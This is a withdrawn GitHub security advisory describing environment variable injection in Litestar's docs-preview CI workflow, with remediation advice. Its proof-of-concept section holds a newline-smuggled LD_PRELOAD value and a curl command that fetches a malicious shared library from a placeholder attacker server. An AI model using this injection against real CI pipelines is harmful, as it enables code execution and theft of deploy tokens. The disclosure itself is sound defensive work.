# Withdrawn Advisory: Litestar has an environment Variable injection in `docs-preview.yml` workflow

**GHSA**: GHSA-4hq2-rpgc-r8r7 | **CVE**: CVE-2024-42370 | **Severity**: high (CVSS 8.3)

**CWE**: CWE-74, CWE-78

**Affected Packages**:
- **litestar** (pip): <= 2.10.0

## Description

## Withdrawn Advisory
This advisory has been withdrawn because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar's CI/CD environment rather than the `litestar` package. While the information in the advisory is still valid, users of the `litestar` package are not affected and do not need to receive Dependabot alerts.

## Original Advisory

### Summary
Litestar's `docs-preview.yml` workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.

### Environment Variable injection (`GHSL-2024-177`)

The [`docs-preview.yml` workflow](https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml) gets triggered when the `Tests And Linting` workflow completes:

```yaml
on:
  workflow_run:
    workflows: [Tests And Linting]
    types: [completed]
```

Later, it downloads and extracts an artifact generated by the triggering workflow:

```yaml
- name: Download artifact
uses: dawidd6/action-download-artifact@v6
with:
  workflow_conclusion: success
  run_id: ${{ github.event.workflow_run.id }}
  path: docs-preview
  name: docs-preview
```

And reads `docs-preview/.pr_number` into an Environment Variable:

```yaml
- name: Set PR number
  run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV
```

The `$GITHUB_ENV` pointed file is just a regular file where every `KEY=VALUE` will be used to define a new Environment Variable after the step completes. Since the contents of the `.pr_number` file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.

An attacker can send a malicious `.pr_number` file with the following content:

```txt
111
LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so
```

Which will result in two Environment Variables being defined:

- PR_NUMBER=111
- LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

In this example we are manipulating the `LD_PRELOAD` environment variable to force the system to load a malicious shared library called `inject.so`. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.

The following step will run the `JamesIves/github-pages-deploy-action` action which will [run the `node` command](https://github.com/JamesIves/github-pages-deploy-action/blob/2c9a889f39c2410b2ca1342f465a53a7c5c389b4/action.yml#L5). Therefore the `LD_PRELOAD` will execute arbitrary code when `node` gets executed:

```yaml
- name: Deploy docs preview
  uses: JamesIves/github-pages-deploy-action@v4
  with:
    folder: docs-preview/docs/_build/html
    token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }}
    repository-name: litestar-org/litestar-docs-preview
    clean: false
    target-folder: ${{ env.PR_NUMBER }}
    branch: gh-pages
```

#### PoC

- Clone the repository
- Edit the `ci.yml` workflow.

```yaml
name: Tests And Linting

on:
  pull_request:

jobs:
  upload-patch:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Save PR number and payload
        run: |
          make payload
          echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number
          curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: docs-preview
          path: payload
```

- Create a Pull Request with this change.
- Since the modified workflow is triggered on `pull_request`, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable `Deploy documentation preview` workflow which will read the malicious artifact and pollute the Environment Variables.

#### Impact

This issue will grant a malicious actor the [following permissions](https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17):

```
  Issues: write
  Metadata: read
  PullRequests: write
```

In addition, the following secret will get exposed to the attacker: `DOCS_PREVIEW_DEPLOY_TOKEN`

#### Remediation

- Verify the contents of the downloaded artifacts.
- Do not allow new lines in the value redirected to GITHUB_ENV

### Resources

- [CodeQL for JavaScript - Expression injection in Actions](https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection/)
- [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/)
- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)

## Disclosure Policy
This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
